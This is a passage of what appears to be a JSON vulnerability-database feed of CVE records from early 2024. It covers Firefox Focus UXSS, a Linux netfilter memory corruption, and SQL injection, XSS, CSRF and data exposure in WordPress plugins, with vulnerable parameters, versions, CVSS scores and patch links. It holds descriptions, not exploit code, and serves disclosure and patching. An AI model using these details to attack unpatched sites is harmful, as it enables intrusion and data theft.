] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855575", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855575", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_focus:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.6, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-22T19:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0606", "ASSIGNER" : "security@mozilla.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855030", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855030", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855030", "name" : "https://bugzilla.mozilla.org/show_bug.cgi?id=1855030", "refsource" : "", "tags" : [ "Issue Tracking", "Permissions Required" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "name" : "https://www.mozilla.org/security/advisories/mfsa2024-03/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:mozilla:firefox_focus:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding" : "122.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-01-22T19:15Z", "lastModifiedDate" : "2025-06-20T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0607", "ASSIGNER" : "secalert@redhat.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0607", "name" : "https://access.redhat.com/security/cve/CVE-2024-0607", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0607", "name" : "https://access.redhat.com/security/cve/CVE-2024-0607", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258635", "name" : "RHBZ#2258635", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258635", "name" : "RHBZ#2258635", "refsource" : "", "tags" : [ "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63", "name" : "https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63", "name" : "https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html", "name" : "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:6.7:rc1:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionEndExcluding" : "6.7", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "HIGH", "baseScore" : 6.6, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 4.7 } }, "publishedDate" : "2024-01-18T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0608", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/includes/Admin/Ajax.php#L471", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/includes/Admin/Ajax.php#L471", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/includes/Admin/Ajax.php#L471", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/includes/Admin/Ajax.php#L471", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79da7239-0343-465e-8dda-44ff440939c4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79da7239-0343-465e-8dda-44ff440939c4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79da7239-0343-465e-8dda-44ff440939c4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79da7239-0343-465e-8dda-44ff440939c4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to union-based SQL Injection via the 'email' parameter in all versions up to, and including, 1.12.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wedevs:wp_erp:*:*:*:*:free:wordpress:*:*", "versionEndIncluding" : "1.12.9", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-29T07:15Z", "lastModifiedDate" : "2025-01-30T15:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0609", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/vendor/google/apiclient/examples/index.php", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/vendor/google/apiclient/examples/index.php", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/erp/trunk/vendor/google/apiclient/examples/index.php", "name" : "https://plugins.trac.wordpress.org/browser/erp/trunk/vendor/google/apiclient/examples/index.php", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/97964ebd-be0b-4187-b393-17edf4ba5caf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/97964ebd-be0b-4187-b393-17edf4ba5caf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/97964ebd-be0b-4187-b393-17edf4ba5caf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/97964ebd-be0b-4187-b393-17edf4ba5caf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'api_key' parameter in all versions up to, and including, 1.12.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wedevs:wp_erp:*:*:*:*:free:wordpress:*:*", "versionEndIncluding" : "1.12.9", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-29T07:15Z", "lastModifiedDate" : "2025-01-30T15:53Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0610", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'MerchantReference' parameter in all versions up to, and including, 1.6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:papaki:piraeus_bank_woocommerce_payment_gateway:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.7.0", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-17T08:15Z", "lastModifiedDate" : "2025-02-26T15:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0611", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://advisory.abay.sh/cve-2024-0611", "name" : "https://advisory.abay.sh/cve-2024-0611", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://advisory.abay.sh/cve-2024-0611", "name" : "https://advisory.abay.sh/cve-2024-0611", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slides callback functionality in all versions up to, and including, 3.9.5. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:averta:master_slider:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.9.10", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-02T12:16Z", "lastModifiedDate" : "2025-01-07T17:38Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0612", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3024861/", "name" : "https://plugins.trac.wordpress.org/changeset/3024861/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3024861/", "name" : "https://plugins.trac.wordpress.org/changeset/3024861/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Content Views – Post Grid, Slider, Accordion (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:contentviewspro:content_views:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.6.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0613", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/delete-custom-fields/trunk/delete-custom-fields.php#L357", "name" : "https://plugins.trac.wordpress.org/browser/delete-custom-fields/trunk/delete-custom-fields.php#L357", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/delete-custom-fields/trunk/delete-custom-fields.php#L357", "name" : "https://plugins.trac.wordpress.org/browser/delete-custom-fields/trunk/delete-custom-fields.php#L357", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Delete Custom Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.1. This is due to missing or incorrect nonce validation on the ajax_delete_field() function. This makes it possible for unauthenticated attackers to delete arbitrary post meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-02T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0614", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://advisory.abay.sh/cve-2024-0614", "name" : "https://advisory.abay.sh/cve-2024-0614", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://advisory.abay.sh/cve-2024-0614", "name" : "https://advisory.abay.sh/cve-2024-0614", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php", "name" : "https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php", "name" : "https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Events Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.4.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pixelite:events_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "6.4.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.8, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.7, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-01-23T19:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0615", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3052982%40content-control%2Ftrunk&old=3007200%40content-control%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a14cce74-6432-4b92-85c8-8b899e4248fd?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Content Control – The Ultimate Content Restriction Plugin! Restrict Content, Create Conditional Blocks & More plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1.0 via the API. This makes it possible for unauthenticated attackers to extract post titles, IDs, slugs, statuses and other information including post content. This includes published content only." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-02T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0616", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3", "name" : 